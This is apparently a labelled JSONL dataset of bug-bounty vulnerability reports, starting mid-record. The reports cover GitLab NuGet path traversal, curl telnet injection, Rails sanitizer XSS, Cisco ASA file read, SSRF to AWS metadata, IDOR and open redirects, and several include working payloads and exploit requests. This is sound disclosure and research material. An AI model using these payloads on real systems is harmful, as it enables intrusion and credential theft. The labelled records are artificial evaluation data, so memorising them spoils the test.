combining the bug with a race condition in Gitaly which I used several times before (#762421, #732330). It could finally be used to read sensitive files in a GitLab instance.\n\nFor some context, a large part of the exploit were explained in #762421, the npm registry issue. Here I will focus on the simple path traversal part which makes a little bit difference.\n\nThe root cause of the path traversal lies at `ee/app/services/packages/nuget/metadata_extraction_service.rb`\n```\n XPATHS = { \n package_name: '//xmlns:package/xmlns:metadata/xmlns:id', \n package_version: '//xmlns:package/xmlns:metadata/xmlns:version' \n }.freeze \n...\n def extract_metadata(file) \n doc = Nokogiri::XML(file) \n \n XPATHS.map do |key, query| \n [key, doc.xpath(query).text] \n end.to_h \n```\nIt extracts the uploaded nupkg (which is in zip format) for the contained nuspec file (which is an XML). And then looks for attribute `id` and `version`. Then the extracted package_name(id), and package_version(version) will be concatenated into a new filename in `ee/app/services/packages/nuget/update_package_from_metadata_service.rb`\n``` \n @package_file.transaction do \n @package_file.update!( \n file_name: package_filename, \n file: @package_file.file \n ) \n...\n def package_filename \n \"#{package_name.downcase}.#{package_version.downcase}.nupkg\" \n end \n```\nSo my payload is:\n``` \n \n \n \n DummyProject.DummyPackage \n ../../../../../nyangawa \n \n \n```\nname the file above as `dummy.nuspec` and zip it into `dummy.nupkg` and upload it through `PUT /api/v4/projects/#{id}/packages/nuget/` endpoint will make GitLab to create a `nyangawa.nupkg` somewhere in the filesystem.\n\nThen I wrote a script (I used in #762421) to combine this issue and the race in Gitaly. I could finally read any file I want in my GitLab instance.\n\n### Steps to reproduce\n\n1. Download the attached exploit.tar.gz and extract it.\n2. Install some requirements by gem install faraday and gem install rubyzip\n3. Edit exp.rb to update some url and credentials\n4. Execute the exp.rb to watch the result of .gitlab_shell_secret of target GitLab instance.\n\n### Examples\n{F750878}\n\n#### Results of GitLab environment info\n```\nroot@localhost:/# gitlab-rake gitlab:env:info\n\nSystem information\nSystem:\t\t\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.6.5p114\nGem Version:\t2.7.10\nBundler Version:1.17.3\nRake Version:\t12.3.3\nRedis Version:\t5.0.7\nGit Version:\t2.24.1\nSidekiq Version:5.2.7\nGo Version:\tunknown\n\nGitLab information\nVersion:\t12.8.7-ee\nRevision", "source": "hackerone", "timestamp": "2022-06-07", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "3fce7bc2270783714438", "text": "[Uncontrolled Resource Consumption] Regular Expression Denial of Service vulnerability\n\n## Summary:\nThe vulnerability I have found is classified as a Regular Expression Denial of Service. While inspecting the source code file [RealtimeGQLSubscriptionAsync.js](https://www.redditstatic.com/desktop2x/RealtimeGQLSubscriptionAsync.226119a9ae841bb563eb.js) I came across the node_module subscriptions-transport-ws (See Screenshot 1). The search result of the [subscriptions-transport-ws package](https://www.npmjs.com/package/subscriptions-transport-ws) on npmjs.com displayed a large deprecation warning at the top of the page (See Screenshot 2) so I decided to research further. The read-me file within the package [github repository](https://github.com/apollographql/subscriptions-transport-ws) states that the package has been largely unmaintained since 2018 and that users should migrate to graphql-ws (See Screenshot 3). Doing a [quick search in the issues tab](https://github.com/apollographql/subscriptions-transport-ws/issues?q=is%3Aissue+is%3Aclosed+vulnerability) for the keyword \"vulnerability\" I came across an issue where the github user PabloJomer pointed out that the package.json lists a vulnerable dependency called ws (See Screenshot 4) The vulnerable package is listed on the NIST National Vulnerability Database under [CVE-2021-32640](https://nvd.nist.gov/vuln/detail/CVE-2021-32640) with a Base Score of 5.3. Further details and a PoC can be found on the Snyk Vulnerability database located [here](https://security.snyk.io/vuln/SNYK-JS-WS-1296835) (See Screenshot 5).\n\nThe policy has some conflicting information so I wasn't exactly sure about what I should do about this vulnerability. The out-of-scope section states \"Previously known vulnerabilities without a working Proof of Concept\" but two sections later it is states to not attempt denial of services attacks. (See screenshot 5) The vulnerability I have found is a Regular expression denial of service but I am strictly forbidden from attempting any denial of service attacks. I believe I have clearly outlined the existence of a vulnerable dependency within you domain and if given the opportunity I could successfully execute the PoC vulnerability as described in the snyk link mentioned above.\n\n## Impact:\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\n\n## Supporting Material/References:\n[OWASP - Regular expression Denial of Service - ReDos](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n\n## Impact\n\nThe ReDos vulnerability can be used to take down your entire site.", "source": "hackerone", "timestamp": "2022-04-12", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "aeb644a587a07ec4675a", "text": "[Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)] CVE-2023-27533: Telnet option IAC injection\n\n## Summary:\n`CURLOPT_TELNETOPTIONS` allows setting various telnet options for telnet protocol. Due to missing encoding of \"Interpret as Command\" `IAC` (0xff) character, the attacker who can control these option values can escape out of the telnet subnegotiation and enter arbitrary TELNET commands (*) via the `CURLOPT_TELNETOPTIONS` options. `TTYPE`, `XDISPLOC` and `NEW_ENV` options are affected.\n\n*) TELNET command refers to \"TELNET COMMAND STRUCTURE\" in RFC 854\n\n## Steps To Reproduce:\n\n 1. `curl --telnet-option NEW_ENV=a,b$(echo -ne \"\\xff\\xf0INJECTED\") telnet://server`\n\nWhen inspected with tcpdump:\n```\n20:57:34.454720 IP x.x.x.x.53864 > y.y.y.y.telnet: Flags [P.], seq 17:37, ack 22, win 2058, options [nop,nop,TS val 1459077881 ecr 3403052525], length 20 [telnet SB NEW-ENVIRON IS 0 0x61 0x1 0x62 SE]\n 0x0000: 4502 0048 0000 4000 4006 265a XXXX XXXX E..H..@.@.&ZXXXX\n 0x0010: YYYY YYYY d268 0017 12a4 daa2 6603 9cb6 YYYY.h......f...\n 0x0020: 8018 080a f840 0000 0101 080a 56f7 c2f9 .....@......V...\n 0x0030: cad6 75ed fffa 2700 0061 0162 fff0 494e ..u...'..a.b..IN\n 0x0040: 4a45 4354 4544 fff0 JECTED..\n\n```\n\n## Remediation\n - Double encode \"Interpret as Command\" (`IAC`) (0xff) if it is encountered when constructing the suboption data to be sent.\n\n## Supporting Material/References:\n * RFC 854 - https://www.rfc-editor.org/rfc/rfc854\n\n## Impact\n\nAttacker being able to specify `TTYPE`, `XDISPLOC` or `NEW_ENV` values is able to inject unintended TELNET commands to the telnet connection. Depending on the use case of the telnet protocol, this may allow the attacker to inject commands or other controlling operations. The practical impact is context specific, but in worst case this could for example allow executing arbitrary OS commands on target system.", "source": "hackerone", "timestamp": "2023-03-22", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "02a4c35f270727ae2e44", "text": "[Integer Overflow] Integer overflow vulnerability\n\n## Summary:\nIn one of my previous reports i send parameter tampering report vulnerability. Then you asked me to send PoC and you just closed it, that's why i'm sending you this new report with exactly name of vulnerability. Integer Overflows are closely related to other conditions that occur when manipulating integers. An Integer Overflow is the condition that occurs when the result of an arithmetic operation, such as multiplication or addition, exceeds the maximum size of the integer type used to store it. When an integer overflow occurs, the interpreted value will appear to have “wrapped around” the maximum value and started again at the minimum value. For example, an 8-bit signed integer on most common computer architectures has a maximum value of 127 and a minimum value of -128. If a programmer stores the value 127 in such a variable and adds 1 to it, the result should be 128. However, this value exceeds the maximum for this integer type, so the interpreted value will “wrap around” and become -128. \n\nAttackers can use these conditions to influence the value of variables in ways that the programmer did not intend. The security impact depends on the actions taken based on those variables. Examples include, but are certainly not limited, to the following:\n\n An integer overflow during a buffer length calculation can result in allocating a buffer that is too small to hold the data to be copied into it. A buffer overflow can result when the data is copied.\n\n When calculating a purchase order total, an integer overflow could allow the total to shift from a positive value to a negative one. This would, in effect, give money to the customer in addition to their purchases, when the transaction is completed.\n\n Withdrawing 1 dollar from an account with a balance of 0 could cause an integer underflow and yield a new balance of 4,294,967,295.\n\n A very large positive number in a bank transfer could be cast as a signed integer by a back-end system. In such case, the interpreted value could become a negative number and reverse the flow of money - from a victim's account into the attacker's.\n\n## Steps To Reproduce:\nBeside card payment, you have option \"cache on delivery\" and there i found one mistake which gives me possibility to change price in last moment.. The moment when you actually should change quantity value is: \n\n\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\n\n## Impact\n\nInteger overflow, quantity value manipulation leads to price manipulation..", "source": "hackerone", "timestamp": "2022-05-17", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "0c19a7714cb09c5f3cc8", "text": "[Information Exposure Through Sent Data] CVE-2022-27779: cookie for trailing dot TLD\n\n## Summary:\nIn CVE-2014-3620 curl prevents cookies from being set for Top Level Domains (TLDs). According to the advisory, curl's \"cookie parser has no Public Suffix awareness\", but it will \"reject TLDs from being allowed\". However, a cookie can still be set for a TLD + trailing dot. \n\nA trailing dot after a TLD is considered legal and curl will send the http://example.com. to http://example.com\n\n## Steps To Reproduce:\n1. Create an Apache file like the following\n````\n GET / HTTP/1.1\n> Host: 127.0.0.1\n> User-Agent: curl/7.83.1\n> Accept: */*\n> Cookie: a=b\n\n> \n* Mark bundle as not supporting multiuse\n< HTTP/1.1 400 Bad Request\n< Date: Tue, 21 Jun 2022 04:09:08 GMT\n< Server: Apache/2.4.43 (Debian)\n< Content-Length: 301\n< Connection: close\n< Content-Type: text/html; charset=iso-8859-1\n< \n\n\n400 Bad Request\n\n

    Bad Request

    \n

    Your browser sent a request that this server could not understand.
    \n

    \n
    \n
    Apache/2.4.43 (Debian) Server at 127.0.1.1 Port 80
    \n\n`````\n\n## Impact\n\nAn attacker can possibly MiTM the connection and poison the cookie store using cookies with control characters, preventing a user / application from ever interacting with the particular HTTP server with the same cookie store.\n\nPossibly same impact as the \"cookie limit\" vulnerability to be announced tomorrow.", "source": "hackerone", "timestamp": "2022-08-31", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "ece881d3aba54a6ace69", "text": "[Privacy Violation] Avatar URL is exposed in patron export for secret donations\n\nWhen user sets their donation Privacy level to \"Secret\" they are indicating that they don't want to be identified by the donation recipient.\n\nBy exporting the `patron_avatar_url`, in `https://liberapay.com//patrons/export.csv`, the user might be exposed just by doing a reverse image search for such avatar.\n\n## Impact\n\nI would hope that there is no gain in trying to deanonymise their donors, but including the avatar should not be needed and I hope it should be an easy fix. \n\n\nI do not wish to be compensated in any way, the reason for using HackerOne is just that I don't want to disclose the issue on Github. Thank you for your great service! :)", "source": "hackerone", "timestamp": "2023-12-15", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "f49f4f19a4357058e052", "text": "OctoberCMS v3.4.0 (Blog) Stored Cross-Site Scripting Vulnerabilities\n\nSeverity: medium", "source": "zeroscience", "timestamp": "2023-12-03", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "bd79fb88d84b3f6ff9e4", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2023-23916: HTTP multi-header compression denial of service\n\n## Summary:\nA server can send an HTTP response with many occurrences of Transfer-Encoding and/or Content-Encoding headers. Each listed encoding allocates a buffer. The number of encodings listed within each header is already bounded but the number of headers is not, allowing an HTTP response to consume all available memory.\n\n## Steps To Reproduce:\nUsing the curl test environment:\n\n 1. Extract test418 from the attached patch\n 2. runtests.pl 418\n \n## Supporting Material/References:\nPatch fixing the problem and new test for the case.\n\n## Impact\n\nDenial of service.", "source": "hackerone", "timestamp": "2023-02-20", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "3bd4de434a516d7ae6a1", "text": "[Open Redirect] Open Redirect\n\nThe following URL is vulnerable to an open redirect (it will redirect to example.com):\nhttps://█████?redirecturl=https://example.com\nI hope you know the impact of open redirect and more info refer\n\n## Impact\n\nUser can be redirect to malicious site.", "source": "hackerone", "timestamp": "2023-01-29", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "71a68c565011eb299699", "text": "[Improper Access Control - Generic] IDOR: Authorization Bypass in LockReport Mutation for public reports\n\n**Summary:**\nHello team, I can lock any public report. \n\n\n### Steps To Reproduce\n\n1. Using your account, make this request. Notice its successful. Report id is the id of any public report.\n```\n{\"operationName\":\"LockReport\",\"variables\":{\"product_area\":\"reports\",\"product_feature\":\"inbox\",\"reportId\":\"Z2lkOi8vaGFja2Vyb25lL1JlcG9ydC8yMTIyNjcx\"},\"query\":\"mutation LockReport($reportId: ID!) {\\n lockReport(\\n input: {report_id: $reportId}\\n ) {\\n was_successful\\n errors {\\n edges {\\n node {\\n id\\n error_code\\n field\\n message\\n __typename\\n }\\n __typename\\n }\\n __typename\\n }\\n __typename\\n }\\n}\\n\"}\n```\n\nPOC report: \nhttps://hackerone.com/reports/2122671 (accidental, Stopped testing after that)\n\n\n\n## Impact\n\nLock any report", "source": "hackerone", "timestamp": "2023-09-13", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "e5c56f4557e8086b0ba2", "text": "[Open Redirect] Attacker can smuggle a malicious domain in a URI object.\n\nSimple example:\n```\nuser_provided_redirect_uri = \"http:////malware.com/real/path\"\nevil_uri = URI.parse(user_provided_redirect_uri)\nevil_uri.host # => nil\nevil_uri.to_s # => \"http://malware.com/real/path\"\n```\n\nIn many common URI-validation scenarios, the target system will likely parse a user provided URI, and then check the host against some internal validation criteria, eg, that it's a host owned by that system. Seeing a blank hostname will often cause the system to assume that the link only contains a path, not a domain, so any validation or checking of that domain won't happen.\n\nHowever, if the URI object is turned back into a string, the resulting URI contains the malicious domain, as you can see above. The actual behavior is to remove two of the leading slashes, so starting with 4 leading slashes will give you 2 leading slashes in the output, which is a well-formed (and in this case malicious) URL.\n\nIn addition, most browsers (all that I checked on) will allow multiple slashes before the domain name -- type \"http:////google.com\" in to your browser, and you will go to google. So, using the original string will also result in a redirection to the malicious host.\n\nBottom line, this bug is almost certainly the cause of a large number of open redirect vulnerabilities in Ruby based web apps. The most obvious use would be to craft malicious URIs for phishing purposes, but it could be used to potentially circumvent any host-checking logic in a URI validator.\n\nThe cause of the bug can be seen here: https://github.com/ruby/ruby/blob/trunk/lib/uri/rfc3986_parser.rb#L6 (if you can spot it in there). The real smoking gun is comment on the line above it that says the regex is modified from the RFC to allow empty host names. A little consideration will show why this causes the above behavior, and why it ends up stripping the initial two leading slashes.", "source": "hackerone", "timestamp": "2022-12-13", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "2aa9e06ce45e17a6db45", "text": "[Improper Access Control - Generic] [h1-2102] Improper Access Control at https://shopify.plus/[id]/users/api in operation UpdateOrganizationUserRole\n\n## Summary:\nThere is an access control issue that happens when a Shopify Plus admin tries to assign a role to a user in another organisation. While the response shows an error message, an email is sent to the shop admin with the first name, last name and email address of the user.\n\n## Steps To Reproduce:\n1. Log in to your Shopify Plus account https://shopify.plus/login\n2. Go to `Administration` -> `Users` -> `Roles` -> `Create role` then proceed to create a role\n3. Go to `Administration` -> `Users` -> `All users` -> `Add users` then proceed to create a user\n4. In `Administration` -> `Users` -> `All users`, click on the new user to go to the user page (ie. https://shopify.plus/34808573/users/34057938)\n6. In `Access and permissions`, in the `Role` section, click on `Change access` then `Change role`\n\n {F1168058} \n\n7. Change the role, and notice the following HTTP request :\n\n ```http\nPOST /34808573/users/api HTTP/1.1\nHost: shopify.plus\n[...]\n\n {\"operationName\":\"UpdateOrganizationUserRole\",\"variables\":{\"id\":\"Z2lkOi8vb3JnYW5pemF0aW9uL09yZ2FuaXphdGlvblVzZXIvMzQwNzE2MzI=\",\"roleId\":\"Z2lkOi8vb3JnYW5pemF0aW9uL1JvbGUvNjYxAAA=\"},\"query\":\"mutation UpdateOrganizationUserRole($id: OrganizationUserID!, $roleId: RoleID!) {\\n updateOrganizationUserRole(id: $id, roleId: $roleId) {\\n organizationUser {\\n id\\n status\\n role {\\n id\\n name\\n __typename\\n }\\n propertyAccess {\\n shops {\\n edges {\\n node {\\n shopUserId\\n status\\n __typename\\n }\\n __typename\\n }\\n __typename\\n }\\n apps {\\n edges {\\n node {\\n status\\n __typename\\n }\\n __typename\\n }\\n __typename\\n }\\n __typename\\n }\\n __typename\\n }\\n userErrors {\\n field\\n message\\n __typename\\n }\\n message\\n operationStatus\\n __typename\\n }\\n}\\n\"}\n```\n8. Base64-decode the `id` value and change the user to `34071632` then send the request again\n9. The request will fail, but you should receive an email containing Anatoly information (first name, last name and email address).\n {F1168063}\n\n## Impact\n\nA Shopify Plus admin can retrieve PII from another user outside his organisation (first name, last name and email address).", "source": "hackerone", "timestamp": "2022-04-21", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "b63e1e078bcdee8de761", "text": "Osprey Pump Controller 1.0.1 Authentication Bypass Credentials Modification\n\nSeverity: critical", "source": "zeroscience", "timestamp": "2023-02-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "d5c2628e2d26c42cc166", "text": "[Path Traversal] [CVE-2020-3452] Unauthenticated file read in Cisco ASA\n\ni found out that https://█████/ was vulnerable to CVE-2020-3452\n\nThe IP has a SSL certificate pointing to ██████████\ncurl -kv https://███████/\n\nOutput;\n```\nServer certificate:\n███\n```\n\n## Impact\n\nAnyone can read any file present on the server.\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nYou can test it by visiting the URL:\n1. https://█████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n2. https://█████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86", "source": "hackerone", "timestamp": "2022-05-12", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "ce62b170ed9efd588382", "text": "[Classic Buffer Overflow] Use of Unsafe function || Strcpy\n\n## Summary:\nIt was observed that application is using strcpy() function which may cause buffer overflow attacks.\n\n#Affected Code\nhttps://github.com/curl/curl\n\n# Affected Lines\n1. Line 195 of curl-master\\tests\\libtest\\stub_gssapi.c\n2. Line 204,212,216 curl-master\\tests\\server\\socksd.c\n\n## Steps To Reproduce:\nLets first discuss what is the issue with strcpy function. basically it takes 2 arguments 1 dst 2 source. the issue is if the dst size is small and the source size is more without a null terminating value so it will overwrite the memory. so in these case 1 got the several lines about strcpy function. but i'm discussing 1 with you rest with remain the same.\n\n else if(!strcmp(key, \"backend\")) {\n strcpy(config.addr, value);\n\n else if(!strcmp(key, \"password\")) {\n strcpy(config.password, value);\n\n char addr[32]; /* backend IPv4 numerical */\n char user[256];\n char password[256];\n\nhere it is copying the value into config.addr and the size of addr is 32 and same goes for password is 256. now let suppose the value of value is more than 32 in case of add and in case of password it is more than 256. than it can be buffer overflow attack here. so here it will be secure if you use the functions like snprintf , strlcpy. or dynamically assign the size to the array.\n\n## Supporting Material/References:\nhttps://cwe.mitre.org/data/definitions/676.html\nhttps://www.geeksforgeeks.org/why-strcpy-and-strncpy-are-not-safe-to-use/\n\n# Recommendation:\nIt is recommended to use below mentioned functions to avoid buffer overflow attacks\n1. snprintf\n2. strlcpy\n\n * [attachment / reference]\nPlease find the attached screenshots for your reference.\n\n## Impact\n\nThe strcpy() function does not specify the size of the destination array, so buffer overrun is often a risk. Using strcpy() function to copy a large character array into a smaller one is dangerous, but if the string will fit, then it will not be worth the risk. If the destination string is not large enough to store the source string then the behavior of strcpy() is unspecified or undefined.", "source": "hackerone", "timestamp": "2022-03-09", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "8e272155fe4224ab386b", "text": "[Unknown] CVE-2023-28322: more POST-after-PUT confusion\n\nOriginal Report:https://hackerone.com/reports/1954658\n\n## Impact\n\nCWE-440: Expected Behavior Violation\nAn attacker could potentially inject data, either from stdin or from an unintended buffer. Further, without even an active attacker, this could lead to segfaults or sensitive information being exposed to an unintended recipient.", "source": "hackerone", "timestamp": "2023-06-25", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "64964d59c175c2b4ae20", "text": "[Code Injection] CVE-2022-21831: Possible code injection vulnerability in Rails / Active Storage\n\nOriginal report: https://hackerone.com/reports/1154034\nRails advisory: https://discuss.rubyonrails.org/t/cve-2022-21831-possible-code-injection-vulnerability-in-rails-active-storage/80199\nBlogpost: https://blog.convisoappsec.com/en/cve-2022-21831-overview-of-the-security-issues-we-found-in-railss-image-processing-api/\n\nIf the report is eligible for a bounty, please split it equally between me and @rsilva, if possible.\n\n## Impact\n\nVulnerable code patterns could allow the attacker to achieve RCE.", "source": "hackerone", "timestamp": "2022-09-10", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "6256152a180e512620e5", "text": "[Business Logic Errors] CVE-2022-27775: Bad local IPv6 connection reuse\n\n## Summary:\nCurl doesn't consider IPv6 address zone index when doing connection reuse. if connection exists to specific IPv6 address (and other conditions for connection reuse are fulfilled) it will be reused for connections regardless of the zone index.\n\n## Steps To Reproduce:\n\n 1.Set up a fake server: `echo -ne 'HTTP/1.1 200 OK\\r\\nContent-Length: 6\\r\\n\\r\\nHello\\n' | nc -6 -v -l -p 9999`\n 2. curl \"http://[ipv6addr]:9999/x\" \"http://[ipv6addr%25lo]:9999/y\"\n\nBoth connections arrive to the test server:\n\n```\nListening on :: 9999\nConnection received on somehost someport\nGET /x HTTP/1.1\nHost: [ipv6addr]:9999\nUser-Agent: curl/7.83.0-DEV\nAccept: */*\n\nGET /y HTTP/1.1\nHost: [ipv6addr]:9999\nUser-Agent: curl/7.83.0-DEV\nAccept: */*\n```\n\nClearly the 2nd connection should fail as the address is not available at interface lo. (Lone connection to `http://[ipv6addr%25lo]:9999/` fails with `curl: (7) Couldn't connect to server`)\n\n## Impact\n\nReuse of wrong connection leading to potential disclosure of confidential information.\n\nPractical impact of this vulnerability is very low, due to the rarity of situation where interfaces would have identical addresses. The attacker would also need to be able to manipulate the addresses the victim app connects to (making it first connect to interface controlled by the attacker).Finally, it doesn't seem likely that TLS would be used for such connections, making the scenario rather insecure to begin with.It seems likely that if the attacker has ability to set up interfaces with identical addresses they would have easier way to compromise the system anyway.", "source": "hackerone", "timestamp": "2022-04-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "577bdf6b5f689910afb3", "text": "[Cross-site Scripting (XSS) - Generic] CVE-2022-23519: Rails::Html::SafeListSanitizer vulnerable to XSS when certain tags are allowed (math+style || svg+style)\n\nThe following is from: https://hackerone.com/reports/1656627\n\n## Intro\n\nThe Rails HTML sanitzier allows to set certain combinations of tags in it's allow list that are not properly handled. \nSimilar to the report [1530898](https://hackerone.com/reports/1530898), which identified the combination`select` and `style` as vulnerable,\nmy fuzz testing from today suggests that also `svg` and `style` as well as `math` and `style` allow XSS.\nThe following are PoCs for each of these allow list:\n- `svg` and `style`: ``\n- `math` and `style`: ``\n\nSee the following IRB session: \n```\nirb(main):016:0> require 'rails-html-sanitizer'\n=> false\nirb(main):017:0> Rails::Html::SafeListSanitizer.new.sanitize(\"\", tags: [\"svg\", \"style\"]).to_s\n=> \"\"\nirb(main):018:0> Rails::Html::SafeListSanitizer.new.sanitize(\"\", tags: [\"math\", \"style\"]).to_s\n=> \"\"\nirb(main):019:0> puts Rails::Html::Sanitizer::VERSION\n1.4.3\n=> nil \n```\n\n## Sample Vulnerable Rails Application\n\nTo build a sample rails application that is vulnerable, I've used the following `Dockerfile`:\n\n```\nFROM ruby:3.1.2\n\nRUN apt-get update && apt-get install -y vim\n\nWORKDIR /usr/src/app\nRUN gem install rails && rails new myapp\nWORKDIR /usr/src/app/myapp\n\n\nCOPY build-rails-app.sh ./build-rails-app.sh\nRUN sh ./build-rails-app.sh\nRUN RAILS_ENV=production rails assets:precompile\n\nCMD [\"./bin/rails\", \"server\", \"-b\", \"0.0.0.0\", \"-e\", \"production\"]\n```\n\nIn the same directory, put a shell script `build-rails-app.sh` which writes the app:\n\n```\n#!/ibn/sh\n\n# make routes\ncat << EOF > ./config/routes.rb\nRails.application.routes.draw do\n get \"/poc1\", to: \"poc1#index\"\n get \"/poc2\", to: \"poc2#index\"\nend\nEOF\n\n# make Poc1 endpoint\n# http://localhost:8888/poc1?name=%3Csvg%3E%3Cstyle%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/style%3E%3Csvg%3E\nbin/rails generate controller Poc1 index --skip-routes\n\ncat << EOF > ./app/controllers/poc1_controller.rb\nclass Poc1Controller < ApplicationController\n def index\n @name = params[:name] || \"put your name here\"\n end\nend\nEOF\n\n\ncat << EOF > ./app/views/poc1/index.html.erb\n

    Hello <%= sanitize @name, tags: [\"svg\", \"style\"] %>

    \n
    \nPoC with a sanitized, reflected parameter 'name' for which 'svg' annd 'style' tags are allowed.\n
    \n<%= link_to \"Go to PoC\", \"/poc1?name=\" %>\n
    \n
    \nUsing: rails-html-sanitizer <%= Rails::Html::Sanitizer::VERSION %>\nEOF\n\n\n# make Poc2 endpoint\n# http://localhost:8888/poc2?name=%3Cmath%3E%3Cstyle%3E%3Cimg%20src=x%20onerror=alert(1)%3E%3C/style%3E%3Cmath%3E\nbin/rails generate controller Poc2 index --skip-routes\n\ncat << EOF > ./app/controllers/poc2_controller.rb\nclass Poc2Controller < ApplicationController\n def index\n @name = params[:name] || \"put your name here\"\n end\nend\nEOF\n\n\ncat << EOF > ./app/views/poc2/index.html.erb\n

    Hello <%= sanitize @name, tags: [\"math\", \"style\"] %>

    \n
    \nPoC with a sanitized, reflected parameter 'name' for which 'math' annd 'style' tags are allowed.\n
    \n<%= link_to \"Go to PoC\", \"/poc2?name=\" %>\n
    \n
    \nUsing: rails-html-sanitizer <%= Rails::Html::Sanitizer::VERSION %>\nEOF\n```\n\nWith the following `Makefile` you can build and run the application\n\n```\n.PHONY: build\nbuild:\n\tdocker build -t local/railspoc:latest .\n\n.PHONY: run\nrun:\n\tdocker run -it --rm -p 127.0.0.1:8888:3000 local/railspoc:latest\n```\n\nNow you have a Rails application with two routes `/poc1` and `/poc2` running locally. Visit:\n- [http://localhost:8888/poc1?name=%3Csvg%3E%3Cstyle%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/style%3E%3Csvg%3E](http://localhost:8888/poc1?n", "source": "hackerone", "timestamp": "2023-01-04", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "ec6981f73b88d317ebfa", "text": "[Server-Side Request Forgery (SSRF)] SSRF in Functional Administrative Support Tool pdf generator (████) [HtUS]\n\n## Summary:\nI found that it is possible to inject a javascript payload during the PDF form creation process, which is then executed by the checklist application server.\n\n## Vulnerable Software: Functional Administrative Support Tool (FAST) v1.0\n\n## Intro: \n\n██████████\n\nAdministrative clerks create a dynamic action items by guiding a███ through targeted questions designed to draw out required administrative actions that are required and trigger of additional processes that need to be completed.\n\nAfter completing the question and answer process ( point 3. Get Action Items ) the application offers 2 options: Send the report by Email or print (See PDF).\n\nWhen the user clicks on (View PDF) they are redirected to the URL:███████/print/checklist/fast_session_XXXXXX.pdf . This is where the user will have access to his PDF form generated dynamically by the███ system.\n\nnote: XXXXXX is the \"session\" assigned by the system to identify a form.\n\n## Steps To Reproduce:\n1. Go to███/ and select \"BEGIN NEW SESSION\", enter a MCC code Ex. \"h99\" and SUBMIT\n2. with burp suite on, select a process, and fill in the data randomly up to point 3. (EDIPI code is a 10 chars long number. Ex. 0123456789) - click CONTINUE\n\n3. in point 3, (Get Action Items) click on PRINT (VIEW PDF) - A window will open with the dynamically generated PDF exposing the data that we complete.\n\n4. observe in burp suite the last request made to /api/save/ proceed to right click and send to \"Repeater\"\n\n5. modify value \"name\" of the json object \"globalInfo\" by the payload:\n\n``\n\nand click Send request. If everything went well, the server responds \"status ok\"\n\n6. Refresh form URL. Ex.████████/print/checklist/fast_session_XXXXXX.pdf\n\nfor this PoC. AWS secretkeys were accessed:\n\n`{ \"Code\" : \"Success\", \"LastUpdated\" : \"2022-07-06T02:57:53Z\", \"Type\" : \"AWS-HMAC\", \"AccessKeyId\" : \"███\", \"SecretAccessKey\" : \"████\", \"Token\" :\"██████\", \"Expiration\" : \"2022-07-06T09:04:49Z\"}`\n\n## Supporting Material/References:\n\n* https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/\n* https://docs.google.com/presentation/d/1JdIjHHPsFSgLbaJcHmMkE904jmwPM4xdhEuwhy2ebvo/htmlpresent\n* https://hackerone.com/reports/508459\n* https://hackerone.com/reports/53088\n\n## Impact\n\nAn attacker can inject malicious javascript payloads in the PDF generation process and executed by the checklist application server. An attacker could use this to Steal credentials or other sensitive information from ████ AWS Instance.", "source": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "6e3b5602dbfab4476abd", "text": "[Server-Side Request Forgery (SSRF)] SSRF ACCESS AWS METADATA - █████\n\nHi Security Team,\nBased on https://hackerone.com/hack-us-h1c challenge, I have urgent vulnerability and the challenge doesn't accept reprots for now 1:56 AM \n.\nI have found a SSRF Vulnerability which allow access to the AWS metadata, using Parameter `?url=` as shown blew\nAn attacker can tunnel into internal networks and access sensitive internal data such as AWS meta data information.\n\n.\n**Http Request**\n```http\nGET /api/v1/download-url?url=http://█████/latest/meta-data/ HTTP/1.1\nHost: ████████\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nAccess-Control-Allow-Origin: *\nReferer: https://████/\nSec-Fetch-Dest: 